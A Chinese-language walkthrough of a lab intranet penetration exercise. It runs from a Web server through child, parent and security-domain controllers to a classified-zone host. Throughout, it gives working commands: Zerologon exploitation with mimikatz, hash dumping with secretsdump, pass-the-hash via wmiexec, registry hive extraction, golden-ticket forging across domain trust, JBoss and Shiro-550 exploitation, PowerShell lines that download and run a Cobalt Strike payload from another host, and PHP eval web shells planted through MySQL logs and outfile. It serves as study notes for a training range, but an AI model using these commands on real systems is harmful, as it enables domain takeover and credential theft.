内网+服务攻防实战模拟（上）

	本篇文章详细记录了一个内网+服务环境靶机的渗透过程 大约涉及到15台主机，由于这些靶机都在虚拟机内搭建和实 战相比有所区别 但可以尽最大程度地模拟实战的情况。从一级代理到三级代理 使用内网安全中常见的攻击手段 置零 攻击票据、域信任等和服务安全常用的渗透手段MSSQL利用存储过程提权 shiro550 Struts2-052漏洞等等 通过对内 网中各个主机的渗透，一步步将Web服务器 子域控 父域控 安全域 涉密域 独立域等主机拿下。 PS：三月入门内网安全 简单完成了项目一 纯内网环境无任何应用 四月五月学习服务攻防 包括五个数据库 八个中间件和五个框架总结了大部分知识点 也对其有了基本了解。本次实战模拟是DAYU师父搭建第二个 实战项目 结合了前三个月内网+服务攻防大部分知识点。 靶场环境简单介绍 靶场环境的大致拓扑图如下 基本的方向也分为两条 一条是独立域方向 连接着5台业务服务器，另一条是安全域方向 连接涉密服务器 本篇文章根据这两条方向分别进行记录 上篇介绍Web服务器 子域控父域控 辅域控 安全域和涉密服务器 这快下篇介绍独立域的7台主机。不多说 开始动手~ 一、Web服务器 重点是内网和服务主机拿下Web服务器就简单概述下~ 1、后台登陆点+密码爆破 使用burpsuite爆破密码 用admin和123456登陆进后台。 2、前台模板写入一句话 在后台模板内容编辑处 发现可以通过前台模板拿shell 在前台模板中写入一句话 3、蚁剑拿shell 分别填上URL地址和连接密码 成功连接 4、上线CS 1）创建监听器111 选择攻击--生成后门--Windows Executable S 创建木马文件webserver.exe 通过蚁剑虚拟终端上传并执行木马文件 成功上线CS 5、使用插件提权 6、建立一级代理 | frp 上传frpc.exe文件 修改frpc.ini文件内容如下 [common] server_addr = 121.xx.xx.xx      # 公网服务器IP server_port = 12001             # 服务器端口 [http_proxy] type = tcp remote_port = 1090      # socks代理端口 plugin = socks5 复制代码 修改frps.ini文件内容 [common] bind_addr = 0.0.0.0     # 绑定地址，0.0.0.0表示本身 bind_port = 12001       # 绑定端口 复制代码 执行顺序： 先在公网服务器上启动frps.exe 后在web服务器上连接 1. 公网服务器 frps.exe -c frps.ini ​ 2. Web服务器 frpc.exe -c frpc.ini 复制代码 二、子域控制器 Hash置零攻击、CVE-2020-1472 1、信息收集 通过CScan nbtscan fscan等扫描器和系统命令ipconfig sysinfo等方式对域内环境 进行信息收集 整合后的数据如下 本机信息: 192.168.73.137    10.10.10.101    DNS为10.10.10.10 (可以确定为子域控IP) 主机名: web 域名: ziyu.dayu.com 10.10.10.5       DAYU\WIN-AMJ9T9TL123            SHARING DC Windows Server 2016 AMJ9T9TL123  dayu.com 10.10.10.6       DAYU\FUYU                       SHARING DC Windows Server 2016 FUYU dayu.com 10.10.10.10 ZIYU0\ZIYU                      SHARING Windows Server 2016 另一IP:10.12.10.5 ZIYU ziyu.dayu.com 10.10.10.66 AQ\WIN-D5NCBKR11G2              SHARING DC Windows Server 2016 另一IP:201.1.10.5 WIN-D5NCBKR11G2 aq.dayu.com 10.10.10.90 DAYU\HEXIN                      SHARING Win7 HEXIN dayu.com 10.10.10.101 ZIYU0\WEB                       SHARING Win7 WEB ziyu.dayu.com 复制代码 分析上面的信息后 可得子域控IP为10.10.10.10，且为win2016操作系统。 可以尝试使用置空攻击（CVE-2020-1472） 2、域控Hash置空漏洞 | CVE-2020-1472 1）上传mimikatz工具 2）检测是否存在CVE-2020-1472 shell mimikatz.exe "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$" "exit" 复制代码 回显OK -- vulnerable表示存在该漏洞 3）执行置零攻击 shell mimikatz.exe "lsadump::zerologon /target:10.10.10.10 /account:ZIYU$ /exploit" "exit" 复制代码 4）空Hash登陆导出Hash值 proxychains impacket-secretsdump -no-pass -just-dc ziyu.dayu.com/ZIYU\$@10.10.10.10 得到a8ad79b7b2c6598658ca0932cbf01e40 复制代码 通过proxychains使用一级代理 5）使用wmiexec.py登陆进Administrator账户 proxychains python3 wmiexec.py -hashes :a8ad79b7b2c6598658ca 0932cbf01e40 ./Administrator@10.10.10.10 复制代码 6）导出SYSTEM SAM等密码文件 接下来就是恢复域控Hash值 恢复完整 登陆进Administrator用户 执行命令下载三个文件 reg save HKLM\SYSTEM system.hive reg save HKLM\SAM sam.hive reg save HKLM\SECURITY security.hive get system.hive get sam.hive get security.hive del /f system.hive del /f sam.hive del /f security.hive 复制代码 7）破解密码文件得到域机器Hash impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL 得到06eedd341333c69b0b2980afa814783a 复制代码 8）恢复域控机器Hash值 使用到脚本reinstall_original_pw.py项目地址：https://github.com/risksense/zerologon proxychains python3 reinstall_original_pw.py ZIYU 10.10.10.10 06eedd341333c69b0b2980afa814783a 复制代码 3、上线CS 1）生成监听10.10.10.0/24网段的中转监听器 2）生成木马文件zz1.exe并拷贝到kali上 3）wmiexec.py连接登陆进shell 上传执行zz1.exe文件，成功上线CS~ proxychains python3 wmiexec.py -hashes :a8ad79b7b2c65986 58ca0932cbf01e40 ./Administrator@10.10.10.10 复制代码 三、父域控制器 CVE-2020-1472 Hash置零攻击 | 10.10.10.5 1、信息收集 IP: 10.10.10.5 操作系统: Win 2016 主机名: WIN-AMJ9T9TL123 域名: dayu.com 使用一级代理进行常规端口扫描 没有发现服务应用程序 判断是个纯域控环境 proxychains nmap -sT -sV -Pn -n -p 8080,3306,6379,80,1433,27017 10.10.10.5 ​ PORT      STATE  SERVICE       VERSION 80/tcp    closed http 1433/tcp  closed ms-sql-s 3306/tcp  closed mysql 6379/tcp  closed redis 8080/tcp  closed http-proxy 27017/tcp closed mongod 复制代码 2、Hash置零攻击拿下父域控 类似子域控的拿下方式 1）上传mimikatz 2）检测是否存在置零攻击的可能 shell mimikatz.exe "lsadump::zerologon /target:10.10.10.5 /acc ount:WIN-AMJ9T9TL123$" "exit" 复制代码 回显OK -- vulnerable表示存在该漏洞 3）执行置零攻击 shell mimikatz.exe "lsadump::zerologon /target:10.10.10.5 /acco unt:WIN-AMJ9T9TL123$ /exploit" "exit" 复制代码 4）空Hash登陆导出Hash值 proxychains impacket-secretsdump -no-pass -just-dc WIN-AMJ9T9 TL123.dayu/WIN-AMJ9T9TL123\$@10.10.10.5 得到:99b81196c641b05ce3cb7fcd7c27e094 复制代码 通过proxychains使用一级代理 5）使用wmiexec.py登陆进Administrator账户 proxychains python3 wmiexec.py -hashes :99b81196c641b05 ce3cb7fcd7c27e094 ./Administrator@10.10.10.5 复制代码 6）导出SYSTEM SAM等密码文件 接下来就是恢复域控Hash值 恢复完整 登陆进shell中 执行以下命令 reg save HKLM\SYSTEM system.hive reg save HKLM\SAM sam.hive reg save HKLM\SECURITY security.hive get system.hive get sam.hive get security.hive del /f system.hive del /f sam.hive del /f security.hive 复制代码 7）破解密码文件得到域机器Hash impacket-secretsdump -sam sam.hive -system system.hive -security security.hive LOCAL 得到4c50080dd9386c7383618a6a379566fc 复制代码 8）恢复域控机器Hash值 使用到脚本reinstall_original_pw.py proxychains python3 reinstall_original_pw.py WIN-AMJ9T9 TL123 10.10.10.5 4c50080dd9386c7383618a6a379566fc 复制代码 PS：用下面的方法恢复Hash暂时无效 望大佬指出错误 shell mimikatz.exe "privilege::debug" "lsadump::postzerologon /targ et:10.10.10.5 /account:WIN-AMJ9T9TL123$" "exit" 复制代码 3、上线CS 先在子域控上创建中转监听器并生成木马文件zz4.exe 再通过wmiexec.py登陆进Administrator账户 上传木马文件zz4.exe 4、拓展：利用域信任拿下父域控 1）域信任相关信息收集 SID信息 shell mimikatz.exe privilege::debug "lsadump::lsa /patch /user:dayu$" "lsadump::trust /patch" "exit" ​ 子域控SID      S-1-5-21-2583698968-2429581080-2114424868 父域控SID      S-1-5-21-3309395417-4108617856-2168433834 子域控rc4      d8d44b17bb424cfb9ef1dec0f7fdcfe5 复制代码 krbtgt的NTLM值 shell mimikatz.exe "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "exit" ​ krbtgt的NTLM值:   37de8c1425b597055f76a037a49adfdd 复制代码 2）利用krbtgt散列值获取目标域的权限 生成黄金票据并注入票据 shell mimikatz.exe "Kerberos::golden /user:administrator /domain:ziyu.dayu.com /sid:S-1-5-21 -2583698968-2429581080-2114424868 /sids:S-1-5-21-3309395417-4108617856-2168433834- 519 /krbtgt:37de8c1425b597055f76a037a49adfdd /ptt" "exit" 复制代码 注入后查看能否访问父域控目录 shell dir \\WIN-AMJ9T9TL123.dayu.com\c$ 复制代码 检查了好几遍还是拒绝访问先留着 之后有技术了回来解决。 正常情况下 能访问到父域控的目录后写入木马文件后可以设置定时任务启动木马文件上线CS 四、辅域控制器 10.10.10.6 | Win 2016 1、信息收集 IP: 10.10.10.6 操作系统: Win 2016 主机名: FUYU 域名: dayu.com 2、上线CS 由于父域控和辅域控是相辅相成的 所以他们两的密码一致 改了一个 另一个就跟着变 通过wmiexec.py登陆进Administrator账户 上传后门文件zz4.exe proxychains python3 wmiexec.py -hashes :99b81196c641b05c e3cb7fcd7c27e094 ./Administrator@10.10.10.6 复制代码 五、父域用户主机 JBoss | 10.10.10.90 IP: 10.10.10.90 操作系统: Win 7 主机名: HEXIN 域名: dayu.com 1、信息收集 使用nmap进行端口扫描 proxychains nmap -sT -sV -Pn -n -p 8080,3306,6379,80,1433,27017 10.10.10.90 ​ PORT      STATE  SERVICE    VERSION 80/tcp    closed http 1433/tcp  closed ms-sql-s 3306/tcp  closed mysql 6379/tcp  closed redis 8080/tcp  open   http       Apache Tomcat/Coyote JSP engine 1.1 27017/tcp closed mongod 复制代码 只开启了一个8080端口 挂代理前往访问看看 发现为JBoss中间件 2、方法一：JBoss自动化工具渗透 使用自动化渗透工具jexboss.py项目地址：https://github.com/joaomatosf/jexboss proxychains python jexboss.py -host http://10.10.10.90:8080 复制代码 存在admin-console漏洞 在提示admin-Console时选择yes 得到一个shell powershell (new-object System.Net.WebClient).DownloadFile('http://10. 10.10.101/zz4.exe','zz4.exe');start-process zz4.exe 复制代码 不过这里执行powershell并没有上线成功过。此外 在内网不好反向连接 这里没啥思路，等大佬捞捞~ 3、方法二：JBoss手动渗透 1）发现JBoss后台登陆界面 http://10.10.10.90:8080/admin-console/login.seam?conversationId=33 复制代码 尝试账号admin以及默认密码admin登陆 成功登陆进去 运气成分 可以用BurpSuite抓包爆破密码 2）上传木马文件war包 4、上线CS 访问该小马 写入zz4.exe后门文件并执行 成功上线CS 六、安全域 Shiro | MySQL | 10.10.10.66 1、信息收集 IP: 10.10.10.66 201.1.10.5 操作系统: Win 2016 主机名: WIN-D5NCBKR11G2 域名: aq.dayu.com 使用nmap获取端口信息： proxychains nmap -sT -sV -Pn -n -p 8080,3306,6379,80,1433,27017 10.10.10.66 ​ PORT      STATE  SERVICE    VERSION 80/tcp    open   http       Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45) 1433/tcp  closed ms-sql-s 3306/tcp  open   mysql      MySQL (unauthorized) 6379/tcp  closed redis 8080/tcp  open   http       Apache Tomcat 8.5.65 27017/tcp closed mongod 复制代码 一个8080 一个3306端口开启 访问10.10.10.66:8080 发现了shiro框架10.10.10.66:8080/shiro 2、方法一：Shiro反序列化漏洞550 使用工具shiro-1.2.4_rce.py进行不出网攻击 项目地址：https://github.com/zhzyker/shiro-1.2.4-rce 执行命令进行验证攻击 proxychains python3 shiro-1.2.4_rce.py http://10.10.10.66:8080/shiro/ 复制代码 3、powershell下载执行文件上线CS 1）放置后门文件 在10.10.10.0/24同网段中有Web服务器可以访问文件 将后门文件zz4.exe放置在Web 服务器上用于获取该后门文件。 2）powershell下载文件并执行 在shiro-1.2.4_rce.py工具中执行命令 powershell (new-object System.Net.WebClient).Download File('http://10.10.10.101/zz4.exe','zz4.exe');start-process zz4.exe 复制代码 成功上线~ 4、方法二：MySQL日志写shell 1）MySQL登陆密码爆破 使用MSF爆破 使用nmap爆破 proxychains nmap --script=mysql-brute -sT -Pn -p 3306 20.20.20.199 root:root 复制代码 密码爆破成功后可以命令行直接登陆执行命令 这里尝试phpmyadmin上执行命令 详细见下篇的第八部分 独立域主机5 2）登陆进phpmyadmin 10.10.10.66/phpmyadmin 3）修改日志路径 | 日志写shell 一般在root权限下允许将general_log选项打开 它可以记录用户用户的每条命令 并保存至对应的文件中 set global general_log = "ON"; set global general_log_file='C:/phpStudy/WWW/xigua.php'; 复制代码 网站路径可在80端口的phpStudy探针上看到 通过命令查看general_log选项值 SHOW VARIABLES LIKE 'general%'; 复制代码 再执行命令 日志会将php一句话这行命令写入进上面设置的xigua.php文件中 select "<?php @eval($_POST['123']);?>"; 复制代码 5、用蚁剑连接shell并上线CS 1）蚁剑连接一句话木马 URL地址    http://10.10.10.66/xigua.php 连接密码    123 2）上传后门文件zz4.exe 3）在虚拟终端执行该文件 七、涉密域 201.1.10.206 1、建立frp二级代理（安全域方向） frp代理文件配置如下 共有4个配置文件 ##安全域 # frpc.ini [common] server_addr = 10.10.10.101 server_port = 12012 [http_proxy] type = tcp remote_port = 1096 plugin = socks5 ​ ##Web服务器 # frps.ini [common] bind_addr = 10.10.10.101 bind_port = 12012 ​ # frpc.ini [common] server_addr = 121.xx.xx.xx server_port = 12012 [http_proxy] type = tcp local_ip = 10.10.10.101 local_port = 1096 remote_port = 1096 ​ ## 公网服务器 # frps.ini [common] bind_addr = 0.0.0.0 bind_port = 12012 复制代码 按下面的执行顺序依次执行 1. Web服务器 frps.exe -c frps.ini 2. 安全域 frpc.exe -c frpc.ini ​ 3. 公网服务器 frps.exe -c frps.ini 4. Web服务器 frpc.exe -c frpc.ini 复制代码 2、信息收集 IP: 201.1.10.206 主机名: SHEMI 域名：aq.dayu.com 通过nmap对其进行端口扫描，发现80和3306 proxychains nmap -sT -sV -Pn -n -p 8080,3306,6379,80,1433,27017 201.1.10.206 ​ PORT      STATE  SERVICE       VERSION 80/tcp    open   http          Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45) 1433/tcp  closed ms-sql-s 3306/tcp  open   mysql         MySQL 5.5.53 6379/tcp  closed redis 8080/tcp  closed http-proxy 27017/tcp closed mongod 复制代码 代理访问http://201.1.10.206/ 为phpStudy探针 可以获得绝对路径信息 3、MySQL outfile写shell 1）mysql密码爆破 使用MSF模块scanner/mysql/mysql_login 设置代理 setg Proxies socks5:121.xx.xx.xx:xx setg ReverseAllowProxy true 复制代码 成功爆破出密码为root 2）写入shell文件 登陆mysql proxychains mysql -uroot -proot -h201.1.10.206 复制代码 查看是否拥有写入文件的权限及写入位置 空表示可以写入任意地址 show global variables like '%secure_file_priv%'; 复制代码 直接写入一句话木马到网站目录下 select '<?php @eval($_POST[123]);?>' into outfile 'C:/phpStudy/WWW/Kr1-shujuku.php'; 复制代码 4、蚁剑连接shell URL地址：  http://201.1.10.206/Kr1-shujuku.php 连接密码：  123 5、上线CS 1）创建中转监听器zhongzhuan5 2）上传zz5.exe并执行 成功上线~~